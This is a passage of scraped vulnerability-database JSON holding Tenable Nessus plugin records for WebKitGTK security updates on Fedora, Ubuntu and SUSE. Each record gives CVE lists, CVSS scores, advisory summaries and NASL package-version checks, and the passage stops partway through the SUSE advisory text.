i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-11T00:00:00", "type": "nessus", "title": "Fedora 24 : webkitgtk4 (2017-9d572cc64a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-9D572CC64A.NASL", "href": "https://www.tenable.com/plugins/nessus/102398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9d572cc64a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102398);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n\n script_name(english:\"Fedora 24 : webkitgtk4 (2017-9d572cc64a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9d572cc64a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"webkitgtk4-2.16.6-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:50", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-03T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2538", "CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3376-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3376-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102161);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"USN\", value:\"3376-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3376-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:19:58", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 18.10 : WebKitGTK&#43; vulnerabilities (USN-3948-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6251", "CVE-2019-8375", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "UBUNTU_USN-3948-1.NASL", "href": "https://www.tenable.com/plugins/nessus/124115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3948-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124115);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6251\", \"CVE-2019-8375\", \"CVE-2019-8506\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n script_xref(name:\"USN\", value:\"3948-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 18.10 : WebKitGTK&#43; vulnerabilities (USN-3948-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3948-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8544\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2022 Canonical, Inc. / NASL script (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:28:48", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to universal cross-site scripting. A logic issue was addressed with improved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-27T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-0497-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0497-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122474);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to\narbitrary code execution. A logic issue existed resulting in memory\ncorruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. (boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to\narbitrary code execution. A type confusion issue was addressed with\nimproved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption 